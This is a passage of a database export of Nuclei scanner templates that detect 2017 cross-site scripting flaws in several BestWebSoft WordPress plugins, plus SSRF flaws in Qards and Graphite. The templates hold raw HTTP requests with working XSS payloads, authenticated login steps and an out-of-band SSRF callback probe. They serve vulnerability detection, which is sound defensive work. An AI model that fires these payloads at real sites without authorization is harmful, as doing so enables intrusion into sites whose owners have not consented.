CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: rating\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/rating-bws/\"\n tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Rating by BestWebSoft\")'\n condition: and\n# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950", "hash": "42e24db85d71b21e599d49219ea10961", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fec" }, "name": "CVE-2017-18532.yaml", "content": "id: CVE-2017-18532\n\ninfo:\n name: Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The realty plugin before 1.1.0 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18532\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18532\n - https://wordpress.org/plugins/realty/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18532\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: realty\n framework: wordpress\n publicwww-query: /wp-content/plugins/realty/\n tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/realty/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Realty by BestWebSoft\")'\n condition: and\n# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950", "hash": "005629000658c60286586e28b2e9b268", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fed" }, "name": "CVE-2017-18536.yaml", "content": "id: CVE-2017-18536\n\ninfo:\n name: WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.\n impact: |\n This vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website.\n remediation: |\n Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501\n - https://wordpress.org/plugins/stop-user-enumeration/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18536\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18536\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: fullworks\n product: stop_user_enumeration\n framework: wordpress\n tags: cve2017,cve,wpscan,wordpress,xss,wp-plugin,fullworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ef531d92525eaf4b6152954eebea1e6c23d7c515afce012b6c1223079ec3ad9002210086b9a6f9ffefa3c35ec6bbe9ee00c650696dced3b57ab09fe2c93ebc05d0a5cf:922c64590222798bb761d5b6d8e72950", "hash": "ca3ffdc9c9c89df338f73c8b75c7f64a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fee" }, "name": "CVE-2017-18537.yaml", "content": "id: CVE-2017-18537\n\ninfo:\n name: Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The visitors-online plugin before 1.0.0 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18537\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18537\n - https://wordpress.org/plugins/visitors-online/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18537\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: visitors_online\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/visitors-online/\"\n tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Visitors Online by\")'\n condition: and\n# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950", "hash": "2ed51cd33ceca34f571e143256f290bb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fef" }, "name": "CVE-2017-18542.yaml", "content": "id: CVE-2017-18542\n\ninfo:\n name: Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18542\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18542\n - https://wordpress.org/plugins/zendesk-help-center/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18542\n cwe-id: CWE-79\n epss-score: 0.00221\n epss-percentile: 0.59511\n cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: zendesk_help_center\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/zendesk-help-center/\"\n tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Zendesk Help Center by BestWebSoft\")'\n condition: and\n# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950", "hash": "8369c0b290c2bc9c327ed8386690e481", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff0" }, "name": "CVE-2017-18556.yaml", "content": "id: CVE-2017-18556\n\ninfo:\n name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.7.1\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18556\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556\n - https://wordpress.org/plugins/bws-google-analytics/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18556\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: google_analytics\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-google-analytics/\"\n tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Google Analytics by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950", "hash": "edc9147ee5c1c5a0c65b01f8d58edd74", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff1" }, "name": "CVE-2017-18557.yaml", "content": "id: CVE-2017-18557\n\ninfo:\n name: Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-google-maps plugin before 1.3.6 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.3.6\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18557\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18557\n - https://wordpress.org/plugins/bws-google-maps/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18557\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: google_maps\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-google-maps/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Google Maps by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950", "hash": "572ae9a3d06fcc3c546496e12f94bf03", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff2" }, "name": "CVE-2017-18558.yaml", "content": "id: CVE-2017-18558\n\ninfo:\n name: Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18558\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18558\n - https://wordpress.org/plugins/bws-testimonials/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18558\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: testimonials\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-testimonials/\"\n tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Testimonials by BestWebSoft\")'\n condition: and\n# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950", "hash": "bd63e073805835fc56728aa26cae0406", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff3" }, "name": "CVE-2017-18562.yaml", "content": "id: CVE-2017-18562\n\ninfo:\n name: Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18562\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18562\n - https://wordpress.org/plugins/error-log-viewer/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18562\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: error_log_viewer\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/error-log-viewer/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Error Log Viewer by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950", "hash": "83c870d42c4a57eed54f774f68043804", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff4" }, "name": "CVE-2017-18564.yaml", "content": "id: CVE-2017-18564\n\ninfo:\n name: Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The sender plugin before 1.2.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18564\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18564\n - https://wordpress.org/plugins/sender/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18564\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: sender\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/sender/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/sender/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Sender by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950", "hash": "6ef1e43ab1d2a5989811d00471506bcd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff5" }, "name": "CVE-2017-18565.yaml", "content": "id: CVE-2017-18565\n\ninfo:\n name: Updater by BestWebSoft < 1.35 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The updater plugin before 1.35 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18565\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18565\n - https://wordpress.org/plugins/updater/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18565\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: updater\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/updater/\"\n tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/updater/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Updater by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950", "hash": "eeb6998704c06e1fbab588f9ad85d43a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff6" }, "name": "CVE-2017-18566.yaml", "content": "id: CVE-2017-18566\n\ninfo:\n name: User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The user-role plugin before 1.5.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18566\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18566\n - https://wordpress.org/plugins/user-role/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18566\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: user_role\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/user-role/\"\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"User Role by BestWebSoft\")'\n condition: and\n# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950", "hash": "502b01017a35b326f459b0eb14997e9e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff7" }, "name": "CVE-2017-18598.yaml", "content": "id: CVE-2017-18598\n\ninfo:\n name: WordPress Qards - Cross-Site Scripting\n author: pussycat0x\n severity: medium\n description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8934\n - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645\n - https://wpvulndb.com/vulnerabilities/8934\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18598\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18598\n cwe-id: CWE-79\n epss-score: 0.00094\n epss-percentile: 0.38554\n cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: designmodo\n product: qards\n framework: wordpress\n tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/qards/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"console.log\"\n# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950", "hash": "b9512fdcb8334bb0460062920d5caebd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ff8" }, "name": "CVE-2017-18638.yaml", "content": "id: CVE-2017-18638\n\ninfo:\n name: Graphite <=1.1.5 - Server-Side Request Forgery\n author: huowuzhao\n severity: high\n description: |\n Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.\n impact: |\n An attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches.\n reference:\n - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html\n - https://github.com/graphite-project/graphite-web/issues/2008\n - https://github.com/advisories/GHSA-vfj6-275q-4pvm\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18638\n - https://github.com/graphite-project/graphite-web/pull/2499\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-18638\n cwe-id: CWE-918\n epss-score: 0.00902\n epss-percentile: 0.80938\n cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: graphite_project\n product: graphite\n tags: cve,cve2017,graphite,ssrf,oast,graphite_project\n\nhttp:\n - 